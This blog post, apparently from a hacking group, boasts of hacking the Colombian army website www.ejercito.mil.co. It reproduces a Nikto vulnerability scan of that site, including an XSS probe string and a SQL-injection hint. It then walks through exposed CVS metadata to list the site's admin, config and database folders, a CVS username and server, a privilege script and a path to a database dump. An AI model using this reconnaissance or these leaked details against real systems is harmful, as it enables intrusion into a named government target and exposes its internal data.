- *************************
 - team hacker blacksystem
 - **************************
 - target:www.ejercito.mil.co
 - Nikto v2.03/2.04
 - ---------------------------------------------------------------------------
 - + Target IP: 201.234.71.183
 - + Target Hostname: www.ejercito.mil.co
 - + Target Port: 80
 - + Start Time: 2009-06-25 8:11:08
 - ---------------------------------------------------------------------------
 - + Server: Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.8i
 - - /robots.txt - contains 4 'disallow' entries which should be manually viewed. (
 - GET)
 - + OSVDB-0: ETag header found on server, inode: 2105479, size: 92, mtime: 0x460a0?
 - b1bf9800
 - + mod_ssl/2.2.10 appears to be outdated (current is at least 2.8.31) (may depend
 - on server version)
 - + mod_ssl/2.2.10 OpenSSL/0.9.8i - mod_ssl 2.8.7 and lower are vulnerable to a re
 - mote buffer overflow which may allow a remote shell (difficult to exploit). http
 - ://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0082.
 - + OSVDB-0: GET /CVS/Entries : CVS Entries file may contain directory listing inf
 - ormation.
 - + OSVDB-0: GET /index.php?module=My_eGallery? : My_eGallery? prior to 3.1.1.g are
 - vulnerable to a remote execution bug via SQL command injection.
 - + OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. Se
 - e http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
 - + OSVDB-877: TRACE / : TRACE option appears to allow XSS or credential theft. Se
 - e http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details
 - + OSVDB-3092: GET /tools/ : This might be interesting...
 - + OSVDB-3093: GET /index.php?base=test%20 : This might be interesting... has bee
 - n seen in web logs from an unknown scanner.
 - + OSVDB-3093: GET /index.php?IDAdmin=test : This might be interesting... has bee
 - n seen in web logs from an unknown scanner.
 - + OSVDB-3093: GET /index.php?pymembs=admin : This might be interesting... has be
 - en seen in web logs from an unknown scanner.
 - + OSVDB-3093: GET /index.php?SqlQuery?=test%20 : This might be interesting... has
 - been seen in web logs from an unknown scanner.
 - + OSVDB-3093: GET /index.php?tampon=test%20 : This might be interesting... has b
 - een seen in web logs from an unknown scanner.
 - + OSVDB-3093: GET /index.php?topic=<script>alert(document.cookie)&
 - amp;lt;/script>%20 : This might be interesting... has been seen in web lo
 - gs from an unknown scanner.
 - + 3577 items checked: 14 item(s) reported on remote host
 - + End Time: 2009-06-25 8:16:08 (324 seconds)
 - ---------------------------------------------------------------------------
 - + 1 host(s) tested
 - Test Options: -host www.ejercito.mil.co
 - ---------------------------------------------------------------------------
 - ----
 - la dirección http://www.ejercito.mil.co//CVS/Entries responde
 - D/cache////
 - D/documentacion////
 - D/js////
 - D/recursos_user////
 - D/tools////
 - D/_administracion////
 - D/_config////
 - D/_crontab////
 - D/_db////
 - D/_editor////
 - D/_include////
 - D/_interfaz////
 - D/_lib////
 - D/_templates////
 - D/_templates_boletin////
 - /.htaccess/1.1/Fri Nov 11 19:34:16 2005//
 - /.project/1.1/Thu Sep 14 16:07:03 2006//
 - /giveprivileges/1.1/Thu Jun 22 14:50:53 2006//
 - /index.php/1.1/Wed Nov 29 13:52:41 2006//
 - /info.php/1.1/Tue Feb 28 19:43:19 2006//
 - /robots.txt/1.1/Tue Aug 16 16:54:52 2005//
 - /contenido.xml/1.2/Thu Dec 14 00:07:15 2006//
 - /BannerNavidad?.jpg/1.1/Thu Dec 14 22:01:17 2006/-kb/
 - /foto_noticias.swf/1.1/Wed Dec 20 20:41:50 2006/-kb/
 - /foto_noticias_ingles.swf/1.1/Wed Dec 20 20:20:16 2006/-kb/
 - D/recursos_foto_noticia////
 - http://www.ejercito.mil.co/giveprivileges es
 - #/bin/sh
 - chmod 777 -R _administracion/templates_c/ cache/ _templates/Default/templates_c/
 - http://www.ejercito.mil.co//CVS/Root es
 - :pserver:aforero@linuxserver:2401/home/cvs
 - http://www.ejercito.mil.co//CVS/Repository es
 - ejercito2007
 - Revisando otros CVS/Entries de otros directorios:
 - http://www.ejercito.mil.co/documentacion/CVS/Entries
 - D/bd////
 - http://www.ejercito.mil.co/documentacion/bd/CVS/Entries
 - D/MSSQL////
 - D/MySQL////
 - D/Oracle////
 - D/PostgreSQL////
 - /bd16-11-2005?.dds/1.1/Wed Jan 11 17:51:06 2006/-kb/
 - /bdmysql-25-07-2006.sql/1.1/Fri Oct 6 15:33:04 2006//
 - /delbdmysql.sql/1.1/Fri Oct 6 15:30:23 2006//
 - y así puede continuarse examinando la estructura del CMS, conociendo los nombres de los archivos pueden revisarse y algunos revelan más información por ejemplo: http://www.ejercito.mil.co/documentacion/bd/bdmysql-25-07-2006.sql
 
Kamis, 17 Mei 2012
hacked .ejercito.mil.co---->blacksystem
Langganan:
Posting Komentar (Atom)


0 komentar:
Posting Komentar